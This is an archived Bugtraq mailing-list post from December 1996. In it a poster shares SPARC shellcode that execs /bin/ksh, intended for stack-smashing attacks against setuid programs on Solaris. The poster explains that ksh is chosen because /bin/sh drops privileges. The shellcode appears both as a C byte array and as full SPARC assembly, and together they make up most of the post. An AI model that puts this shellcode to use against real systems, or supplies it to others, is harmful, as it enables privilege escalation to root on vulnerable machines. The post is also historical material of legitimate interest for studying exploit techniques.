Bugtraq mailing list archives
/bin/ksh sparc code
From: zomo () home serome co kr (Kichang Yang)
Date: Tue, 3 Dec 1996 20:22:22 +0900
It seems that "smashin' the stack" attack (the term is borrowed from Aleph1's article) is the hottest topic of bugtraq these days. (except symlink-to-/.rhosts attack, of course.) If I remember correctly, the sparc code appeared on the bugtraq is doing something like execl("/bin/sh","sh",0), and you know, Solaris 2.4 /bin/sh does setuid(getuid()) unless "-p" isn't specified, So it's kinda useless when it comes to attacking setuid'ed files. So, I made sparc code for doing something *like* execl("/bin/ksh","ksh",0). I know it's no big deal, almost close to lame, but I think it's kinda useful. You'd like to check out Aleph1's article appeared (or will?) on Phrack 49. I tested it on sun4d and I'm not sure it would work on other architecture. Bye. -- ksh.sparc.code.c #define SPARC_NOP 0xac15a16e char ksh_sparc_shellcode[] = "\x2d\x0b\xd8\x9a" "\xac\x15\xa1\x6e" "\x2f\x0b\xda\xdc" "\xae\x15\xe3\x68" "\x90\x0b\x80\x0e" "\x92\x03\xa0\x0c" "\x94\x1a\x80\x0a" "\x9c\x03\xa0\x14" "\xec\x3b\xbf\xec" "\xc0\x23\xbf\xf4" "\xdc\x23\xbf\xf8" "\xc0\x23\xbf\xfc" "\x82\x10\x20\x3b" "\x91\xd0\x20\x08" "\x90\x1b\xc0\x0f" "\x82\x10\x20\x01" "\x91\xd0\x20\x08"; -- ksh.sparc.s .section ".data1" .align 4 .L16: .ascii "ksh.sparc.code goes\n\0" .section ".text" .global main main: save %sp, -96, %sp set .L16,%o0 call printf,1 nop sethi %hi(0x2f626800), %l6 or %l6, 0x16e, %l6 sethi %hi(0x2f6b7000), %l7 or %l7, 0x368, %l7 and %sp, %sp, %o0 add %sp, 12, %o1 xor %o2, %o2, %o2 add %sp, 20, %sp std %l6, [%sp - 20] st %g0, [%sp - 12] st %sp, [%sp - 8] st %g0, [%sp - 4] mov 0x3b, %g1 ta 8 xor %o7, %o7, %o0 mov 1, %g1 ta 8 restore --
Current thread:
- Vulnrability in test-cgi... Apropos of Nothing (Nov 30)
- denial of service attack on login NuNO (Dec 01)
- Re: Vulnrability in test-cgi... Roger Espel Llima (Dec 01)
- Little feature/bug in RedHat Linux Antti Andreimann (Dec 01)
- Users can modify routing in AIX 4.1 Dave Roberts (Dec 02)
- Re: Users can modify routing in AIX 4.1 Troy Bollinger (Dec 02)
- <Possible follow-ups>
- Re: Vulnrability in test-cgi... Jesus Altuve (Dec 02)
- Re: Vulnrability in test-cgi... Joe Zbiciak (Dec 02)
- /bin/ksh sparc code Kichang Yang (Dec 03)
- AltaVista Firewall for UNIX Sarah Keating (Dec 03)